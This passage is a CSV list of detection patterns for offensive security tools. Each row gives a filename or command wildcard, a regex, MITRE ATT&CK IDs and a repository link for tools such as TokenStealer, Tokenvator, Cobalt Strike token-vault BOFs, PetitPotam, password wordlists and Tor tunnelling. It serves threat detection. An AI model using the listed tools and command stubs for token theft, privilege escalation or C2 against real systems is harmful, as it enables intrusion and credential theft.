"*tokenprivs.exe*",".{0,1000}tokenprivs\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*TokenStealer.cpp*",".{0,1000}TokenStealer\.cpp.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*TokenStealer.exe*",".{0,1000}TokenStealer\.exe.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*TokenStealer.sln*",".{0,1000}TokenStealer\.sln.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*TokenStealer.vcxproj*",".{0,1000}TokenStealer\.vcxproj.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*TokenStealer-master*",".{0,1000}TokenStealer\-master.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*TokenStealing.cs*",".{0,1000}TokenStealing\.cs.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*TokenStealing.exe*",".{0,1000}TokenStealing\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*TokenStomp.exe*",".{0,1000}TokenStomp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*TokenStripBOF/src*",".{0,1000}TokenStripBOF\/src.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","10","10","32","6","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" "*TokenTactics.psd1*",".{0,1000}TokenTactics\.psd1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*TokenTactics.psm1*",".{0,1000}TokenTactics\.psm1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*TokenTactics-main.zip*",".{0,1000}TokenTactics\-main\.zip.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*TokenUniverse.dproj*",".{0,1000}TokenUniverse\.dproj.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*TokenUniverse.exe*",".{0,1000}TokenUniverse\.exe.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*TokenUniverse-master.zip*",".{0,1000}TokenUniverse\-master\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*TokenUniverse-x64.zip*",".{0,1000}TokenUniverse\-x64\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*TokenUniverse-x86.zip*",".{0,1000}TokenUniverse\-x86\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*Tokenvator*",".{0,1000}Tokenvator.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to alter privilege with Windows Tokens","T1055 - T1003 - T1134","TA0004 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator*.exe*",".{0,1000}Tokenvator.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator.csproj*",".{0,1000}Tokenvator\.csproj.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator.exe*",".{0,1000}Tokenvator\.exe.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator.git*",".{0,1000}Tokenvator\.git.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator.pdb*",".{0,1000}Tokenvator\.pdb.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator.Plugins*",".{0,1000}Tokenvator\.Plugins.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator.Resources*",".{0,1000}Tokenvator\.Resources.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator.sln*",".{0,1000}Tokenvator\.sln.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator/MonkeyWorks*",".{0,1000}Tokenvator\/MonkeyWorks.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*token-vault steal*",".{0,1000}token\-vault\ssteal.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*token-vault.cna*",".{0,1000}token\-vault\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*token-vault.x64.o*",".{0,1000}token\-vault\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*token-vault.x86.o*",".{0,1000}token\-vault\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*TokenViewer.exe*",".{0,1000}TokenViewer\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*tokyoneon/Chimera*",".{0,1000}tokyoneon\/Chimera.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*tomcarver16/ADSearch*",".{0,1000}tomcarver16\/ADSearch.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","5","403","45","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*tomcat_mgr_default_userpass.txt*",".{0,1000}tomcat_mgr_default_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*tomcat-rootprivesc-deb.sh*",".{0,1000}tomcat\-rootprivesc\-deb\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*tomcatWarDeployer -v -x -p * -H * ",".{0,1000}tomcatWarDeployer\s\-v\s\-x\s\-p\s.{0,1000}\s\-H\s.{0,1000}\s","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Tool-PassView*",".{0,1000}Tool\-PassView.{0,1000}","offensive_tool_keyword","Tool-PassView","Password recovery or exploitation","T1003 - T1021 - T1056 - T1110 - T1212","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/password_recovery_tools.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*tools/ligolo*",".{0,1000}tools\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*top100_sublist.txt*",".{0,1000}top100_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*top1000_sublist.txt*",".{0,1000}top1000_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*Top109Million-probable-v2.txt*",".{0,1000}Top109Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top12Thousand-probable-v2.txt*",".{0,1000}Top12Thousand\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top1575-probable-v2.txt*",".{0,1000}Top1575\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top1pt6Million-probable-v2.txt*",".{0,1000}Top1pt6Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top207-probable-v2.txt*",".{0,1000}Top207\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top29Million-probable-v2.txt*",".{0,1000}Top29Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top2Billion-probable-v2.txt*",".{0,1000}Top2Billion\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top304Thousand-probable-v2.txt*",".{0,1000}Top304Thousand\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top353Million-probable-v2.txt*",".{0,1000}Top353Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*topotam.exe*",".{0,1000}topotam\.exe.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*topotam/PetitPotam*",".{0,1000}topotam\/PetitPotam.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*top-usernames-shortlist.txt*",".{0,1000}top\-usernames\-shortlist\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*tor --DataDirectory *",".{0,1000}tor\s\-\-DataDirectory\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*tor@default.service*",".{0,1000}tor\@default\.service.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","service name","10","10","N/A","N/A","N/A","N/A" "*tor_hiddenservices.rb*",".{0,1000}tor_hiddenservices\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*tor_services.py*",".{0,1000}tor_services\.py.{0,1000}","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","147","39","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*tor2web start*",".{0,1000}tor2web\sstart.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - 